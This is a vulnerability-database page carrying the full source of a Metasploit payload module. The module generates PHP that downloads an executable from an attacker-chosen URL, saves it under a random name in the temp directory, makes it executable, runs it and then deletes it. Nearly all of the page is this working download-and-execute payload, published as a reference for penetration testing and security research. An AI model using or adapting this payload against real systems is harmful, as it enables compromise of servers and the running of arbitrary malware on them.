Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHP Executable Download and Execute

🗓️ 26 Jul 2009 23:08:31Reported by egypt <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 43 Views

PHP Executable Download and Execute - Module for downloading and executing an EXE file via PHP cod

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = :dynamic

  include Msf::Payload::Php
  include Msf::Payload::Single

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'PHP Executable Download and Execute',
      'Description'   => 'Download an EXE from an HTTP URL and execute it',
      'Author'        => [ 'egypt' ],
      'License'       => BSD_LICENSE,
      'Platform'      => 'php',
      'Arch'          => ARCH_PHP,
      'Privileged'    => false
      ))

    # EXITFUNC is not supported :/
    deregister_options('EXITFUNC')

    # Register command execution options
    register_options(
      [
        OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
      ])
  end

  def php_exec_file
    exename = Rex::Text.rand_text_alpha(rand(8) + 4)
    dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
    shell = <<-END_OF_PHP_CODE
    #{php_preamble(disabled_varname: dis)}
    if (!function_exists('sys_get_temp_dir')) {
      function sys_get_temp_dir() {
        if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
        if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
        if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
        $tempfile=tempnam(uniqid(rand(),TRUE),'');
        if (file_exists($tempfile)) {
          @unlink($tempfile);
          return realpath(dirname($tempfile));
        }
        return null;
      }
    }
    $fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "#{exename}.exe";
    $fd_in = fopen("#{datastore['URL']}", "rb");
    if ($fd_in === false) { die(); }
    $fd_out = fopen($fname, "wb");
    if ($fd_out === false) { die(); }
    while (!feof($fd_in)) {
      fwrite($fd_out, fread($fd_in, 8192));
    }
    fclose($fd_in);
    fclose($fd_out);
    chmod($fname, 0777);
    $c = $fname;
    #{php_system_block(cmd_varname: "$c", disabled_varnam: dis)}
    @unlink($fname);
    END_OF_PHP_CODE

    #return Rex::Text.compress(shell)
    return shell
  end

  #
  # Constructs the payload
  #
  def generate(_opts = {})
    return php_exec_file
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Nov 2022 02:10Current
7.3High risk
Vulners AI Score7.3
metasploitdownload and executephphttpcommand executionsecurity
43